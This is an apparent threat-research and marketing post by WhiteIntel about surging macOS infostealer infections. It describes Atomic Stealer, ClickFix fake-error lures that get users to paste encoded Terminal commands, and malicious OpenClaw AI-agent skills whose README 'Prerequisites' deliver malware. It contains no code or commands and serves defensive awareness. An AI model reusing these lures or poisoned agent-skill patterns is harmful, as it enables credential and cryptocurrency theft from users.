The macOS Infostealer Explosion
While Windows infostealer activity declined 30% year-over-year, macOS infections exploded by 3,276%. The "Macs are secure" assumption is dead.
Whiteintel Team
Threat Research
WhiteIntel's threat intelligence platform tracks credential exposure across underground marketplaces, infostealer logs, and combolist networks. Between Q1 2025 and Q1 2026, we observed a dramatic shift in the infostealer landscape — one that challenges long-held assumptions about macOS security.
These figures represent deduplicated, unique credential exposures indexed by WhiteIntel's database engine — not raw marketplace listings or unverified data. Each log corresponds to a distinct macOS device infection where credentials, session tokens, and sensitive data were harvested and sold on underground markets.
Windows infections declined. macOS infections surged by over 3,000%. What changed?
Why macOS Became a Target
For years, the security community repeated a comfortable narrative: "Macs don't get malware." The assumption relied on market share (fewer targets), UNIX-based security (more secure by design), and Apple's control over the ecosystem (harder to compromise).
That narrative is becoming obsolete.
The Target Profile Shifted
macOS users disproportionately represent high-value targets: developers with access to corporate repositories and cloud infrastructure, cryptocurrency traders managing substantial holdings, creative professionals with client data and intellectual property, and executives using personal MacBooks for corporate access.
Atomic Stealer (AMOS), the most prevalent macOS infostealer, specifically targets cryptocurrency wallets alongside traditional credentials. According to Trend Micro's February 2026 analysis, AMOS exfiltrates Apple and KeePass keychains, browser credentials, cloud service tokens, and extensive user documents.
The average macOS infostealer log contains higher-value credentials than typical Windows logs. Developers store AWS keys, GitHub tokens, SSH private keys, and API credentials on development machines. Cryptocurrency users maintain wallet files and seed phrases. Corporate users save VPN configurations and cloud service access.
M1/M2 Adoption in Enterprise
Apple Silicon's enterprise adoption accelerated. Organizations standardized on M1 and M2 MacBooks for development teams, executives, and remote workers — creating concentrated pools of high-value corporate access on macOS devices.
According to Kaspersky's security audit in January 2026, OpenClaw infections specifically targeted Apple ecosystem users, many running the platform on Mac mini stacks. The concentration of technical users on Apple hardware made macOS an increasingly attractive target.
The Distribution Methods Evolved
Traditional macOS malware relied on social engineering users into manually installing malicious applications. Gatekeeper and XProtect provided reasonable protection against straightforward attacks.
Modern macOS infostealers don't fight these protections — instead, they bypass them entirely through user-assisted execution.
ClickFix: Social Engineering Defeats Security Controls
ClickFix emerged as the primary macOS infection vector. The technique tricks users into executing malicious commands through Terminal by presenting fake error messages or verification prompts.
According to ESET research published in June 2025, ClickFix attacks surged 517% in the first half of 2025, accounting for nearly 8% of all blocked attacks. By late 2025, campaigns had specifically adapted for macOS users.
How ClickFix Works on macOS
- 1 User visits a compromised or malicious website
- 2 Page displays a fake error impersonating a legitimate service (ChatGPT, trading platform, software verification)
- 3 Error claims the user needs to 'verify' or 'fix' an issue by running a Terminal command
- 4 User is instructed: press ⌘+Space, type Terminal, then paste the provided command
- 5 The command is a malicious Base64-encoded script — directly executed by the user
- 6 No Gatekeeper check. No signature scan. The system sees intentional user action.
Microsoft documented a June 2025 ClickFix campaign targeting macOS users to deliver Atomic macOS Stealer. The campaign impersonated Spectrum (a US cable/internet provider) and redirected users to ClickFix-themed delivery websites with fake CAPTCHA verification.
Why It Bypasses macOS Security Gatekeeper and XProtect scan downloaded applications for malware signatures. ClickFix doesn't download traditional applications. The malicious code executes directly through Terminal after the user manually pastes and runs it. From the system's perspective, the user intentionally executed a command. No quarantine. No signature check. No security prompt beyond the standard Terminal permission that users regularly approve.
According to Datadog Security Labs analysis published February 2026, attackers created fake GitHub repositories impersonating software companies, leveraging ClickFix as the initial access technique. These repositories lacked actual application code — only READMEs with download links leading to redirect chains ending at ClickFix pages. Campaigns used SEO poisoning to rank malicious links prominently in search results.
Intego documented a "Matryoshka" ClickFix variant in January 2026 using typosquatting. Users mistyping software review sites landed on pages serving ClickFix prompts. The pasted command retrieved shell scripts containing encoded payloads that unpacked at runtime.
OpenClaw: Supply Chain Attacks Through AI Agents
OpenClaw (originally Clawdbot, briefly Moltbot) launched in late 2025 as an autonomous AI agent for macOS. Users could extend functionality through "skills" — modular plugins distributed via ClawHub and other repositories.
By February 2026, this skill ecosystem became a malware distribution network.
The Attack Flow
- 1. User discovers an OpenClaw skill for desired functionality
- 2. Skill's README contains a "Prerequisites" section
- 3. Prerequisites instruct user to download and run "required dependencies"
- 4. Links lead to malicious infrastructure serving Atomic Stealer
Scale of the Campaign
- → 2,200+ malicious skills identified on GitHub (Trend Micro, Feb 2026)
- → 341 skills tied to single "ClawHavoc" operation
- → 17% of reviewed OpenClaw skills showed malicious intent (Bitdefender)
- → 512 vulnerabilities identified in OpenClaw, 8 classified critical (Kaspersky)
Real-World Incident Huntress documented fake OpenClaw installers on GitHub deploying both AMOS for macOS and Windows infostealers, using a novel packer called Stealth Packer. The campaign broadly targeted users attempting to install OpenClaw between February 2nd and 10th, 2026. 1Password's security analysis noted: "if you're the kind of person installing agent skills, you are exactly the kind of person whose machine is worth stealing from."
What Gets Stolen from macOS
Modern macOS infostealers target high-value data well beyond basic browser credentials.
| Data Category | What Gets Exfiltrated | Impact |
|---|---|---|
| Cryptocurrency Wallets | MetaMask, Phantom, Coinbase extensions, desktop wallet files, seed phrases, private keys | Immediate and irreversible financial loss |
| Developer Credentials | SSH private keys, AWS access keys, GitHub tokens, API credentials, cloud service tokens | Full corporate infrastructure exposure |
| Browser Data | Saved passwords, active session cookies, autofill data, credit card info | MFA bypass via session token reuse |
| macOS Keychain | Certificates, encryption keys, email/cloud/VPN credentials for all apps | Complete account ecosystem compromise |
| Application Credentials | Email clients, messaging apps, FTP configs, cloud storage tokens | Lateral movement and data exfiltration |
The average macOS infostealer log, according to WhiteIntel's analysis, contains credentials for multiple high-value services. A single infection can expose corporate infrastructure access, personal cryptocurrency holdings, and development environment credentials simultaneously.
The Detection Problem
Traditional endpoint protection struggles with user-assisted execution. When a user manually pastes and runs a Terminal command, the system sees intentional user action. EDR logs the execution, but the command appears as user-initiated activity.
Sophos noted in December 2025 that even with endpoint protection configured, detection often occurs only when an OpenClaw skill attempts to write retrieved payloads to disk. ClickFix execution that stays in-memory evades file-based detection entirely.
The Visibility Gap
Corporate security tools monitor managed devices. An employee running AMOS on a personal MacBook used for VPN access remains completely invisible to corporate EDR, SIEM, and network monitoring. The infection happens outside your visibility. The impact lands directly inside your organization.
The WhiteIntel Visibility Advantage
When macOS devices get infected and credentials are harvested, traditional security tools often miss the compromise entirely. The infection happens on personal devices. The execution appears user-initiated. No corporate infrastructure is touched.
But those credentials end up somewhere visible: underground marketplaces.
WhiteIntel tracks macOS-specific infostealer logs across Russian Market, 2easy, Telegram channels, and direct marketplace feeds. When employee credentials from corporate domains appear in fresh macOS stealer logs, organizations receive alerts within 24–48 hours. The 3,276% increase observed between Q1 2025 and Q1 2026 came from monitoring these sources in real-time. Traditional breach notification would discover these compromises months later, if at all.
When WhiteIntel detects corporate credentials in a macOS infostealer log, security teams receive actionable intelligence: the infection is recent (typically within 48 hours of marketplace listing), the credentials are current and likely still valid, the log may contain active session tokens requiring immediate invalidation, and the compromised device is identified as a Mac — informing investigation and remediation scope.
The Trend Trajectory
The 33.8x growth in macOS infections year-over-year indicates this isn't a temporary spike. Attack methods evolved specifically for macOS — ClickFix Terminal workflows, OpenClaw supply chain attacks. Target profiles shifted toward high-value macOS users. Distribution networks adapted through fake GitHub repositories, poisoned search results, and malicious agent skills.
Organizations can't assume macOS devices are immune. Employees use personal MacBooks for corporate access. Developers run unvetted code from public repositories. Technical users install AI agents and community plugins without security review.
Security teams can't prevent every infection on devices they don't control. But they can monitor when credentials from those infections surface on marketplaces — and respond within the 48-hour window before exploitation occurs.
The "Macs are secure" narrative is dead. The question is whether your monitoring adapted to the new reality. WhiteIntel's macOS-aware credential monitoring extends visibility to the exposures your endpoint tools can't see — because in 2026, the devices outside your control are the ones that matter most.
To learn more about monitoring macOS credential exposure and infostealer activity, explore our solutions at whiteintel.io.